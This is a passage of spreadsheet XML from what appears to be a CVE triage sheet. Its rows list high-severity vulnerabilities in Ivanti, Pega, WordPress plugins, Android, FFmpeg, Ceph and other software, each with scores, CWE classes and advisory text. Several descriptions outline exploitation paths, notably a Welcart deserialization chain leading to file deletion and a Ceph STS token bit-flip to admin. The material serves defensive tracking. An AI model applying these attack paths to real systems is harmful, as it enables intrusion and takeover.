      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr"/>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr"/>
      <c r="Q216" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="S216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12648</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12651</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr"/>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr"/>
      <c r="Q217" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="S217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12651</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13761</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>security@pega.com</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr"/>
      <c r="Q218" s="5" t="inlineStr">
        <is>
          <t>CWE-606</t>
        </is>
      </c>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>Pega Platform versions 7.1.0 through 25.1.2 are affected by an improper validation of inputs that are used for loop conditions, potentially leading to a denial of service or other consequences because of excessive looping.</t>
        </is>
      </c>
      <c r="S218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13761</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14828</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>0fc0942c-577d-436f-ae8e-945763c79b02</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr"/>
      <c r="Q219" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>Zohocorp ManageEngine Password Manager Pro versions before 13235, PAM360 versions before 8561, and Access Manager Plus versions before 4405 are vulnerable to an authenticated SQL Injection vulnerability.</t>
        </is>
      </c>
      <c r="S219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14828</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16502</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr"/>
      <c r="Q220" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>The Live Composer – Free WordPress Website Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.1.18 via deserialization of untrusted input . This makes it possible for authenticated attackers, with contributor-level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t>
        </is>
      </c>
      <c r="S220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16502</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18198</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr"/>
      <c r="Q221" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in TAC Information Services Internal and External Trade Inc. GOLDENHORN ONEIT allows Blind SQL Injection.
This issue affects GOLDENHORN ONEIT: before Göbeklitepe.</t>
        </is>
      </c>
      <c r="S221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18198</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18341</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr"/>
      <c r="K222" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr"/>
      <c r="Q222" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to corrupt memory due to an integer underflow.</t>
        </is>
      </c>
      <c r="S222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18341</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18480</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr"/>
      <c r="Q223" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>The SureCart  WordPress plugin before 4.6.3 does not ensure that the account affected by a customer update is the same account its permission check authorised, allowing users with a subscriber-level account to change another user's email address, including an administrator's, and take over that account via a password reset. It further allows an attacker-controlled customer record to be associated with an arbitrary user, and discloses customer identifiers and email addresses to any authenticated user, which together make the takeover reachable from a subscriber-level account alone.</t>
        </is>
      </c>
      <c r="S223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18480</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18851</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr"/>
      <c r="K224" s="5" t="inlineStr">
        <is>
          <t>ivanti:endpoint_manager_mobile</t>
        </is>
      </c>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr"/>
      <c r="Q224" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Ivanti Endpoint Manager Mobile before version 12.10.0.0, 12.9.0.2, and 12.8.0.4 allows a remote authenticated attacker to escalate their privileges to admin.</t>
        </is>
      </c>
      <c r="S224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18851</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19887</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr"/>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr"/>
      <c r="Q225" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>The Welcart e-Commerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.12.1 via deserialization of untrusted input in the Telecom EDY payment callback (usces_action_acting_transaction). Unauthenticated attackers can store arbitrary 'reserve' key/value pairs as order metadata during a public checkout, then invoke the callback with an attacker-chosen 'option' parameter to select and unserialize that metadata without any provider signature, source-address, transaction-identity or ownership check. A POP chain is present in the TCPDF library bundled with the plugin itself, so no additional plugin or theme is required. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, including wp-config.php, which can lead to remote code execution when an attacker re-runs the WordPress installer against a database they control. Successful exploitation is contingent on an admin printing an invoice to trigger file deletion.</t>
        </is>
      </c>
      <c r="S225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19887</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28609</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr"/>
      <c r="K226" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr"/>
      <c r="Q226" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>In read of MatroskaExtractor.cpp, there is a possible out-of-bounds write due to improper casting. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28609</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28618</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr"/>
      <c r="K227" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr"/>
      <c r="Q227" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>In dec_frm_prepare of oapv.c, there is a possible OOB write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28618</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28666</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr"/>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr"/>
      <c r="Q228" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R228"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S228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28666</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30754</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr"/>
      <c r="K229" s="5" t="inlineStr"/>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr"/>
      <c r="Q229" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>A memory corruption vulnerability exists in FFmpeg before 8.1. The RTP encoding process. In the nal_send function in libavformat/rtpenc_h264_hevc.c, a negative size parameter (size=-3) is passed to memcpy when transmitting H.264/HEVC streams via RTP using a crafted input file. This was detected using AddressSanitizer.</t>
        </is>
      </c>
      <c r="S229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30754</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39944</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr"/>
      <c r="K230" s="5" t="inlineStr"/>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr"/>
      <c r="Q230" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>Ceph is an open-source distributed storage platform providing object, block, and file storage. In versions prior to 20.2.4 and 19.2.6, the RADOS Gateway (RGW) protects STS session tokens with an AES-128-CBC handler that provides no message authentication, allowing an attacker who holds any valid STS token to tamper with it undetected and escalate to full RGW administrative access. Because the ciphertext is unauthenticated, the attacker can perform a CBC bit-flip on the acct_type, perm_type, and is_admin fields of their own token, and a forged is_admin value triggers a global administrative override that bypasses all capability checks. The attack is reachable remotely over the RGW S3 endpoint and is a self-contained modification of a token the attacker already possesses, requiring no encryption oracle and no network observation. It requires only a single valid STS token, which need not carry any elevated privileges, with STS enabled. This issue is fixed in versions 20.2.4 and 19.2.6.</t>
        </is>
      </c>
      <c r="S230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39944</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49879</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr"/>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr"/>
      <c r="Q231" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of rw_t3t.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49879</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49882</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr"/>
      <c r="K232" s="5" t="inlineStr"/>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr"/>
      <c r="Q232" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible memory safety issue due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49882</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51974</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="n">
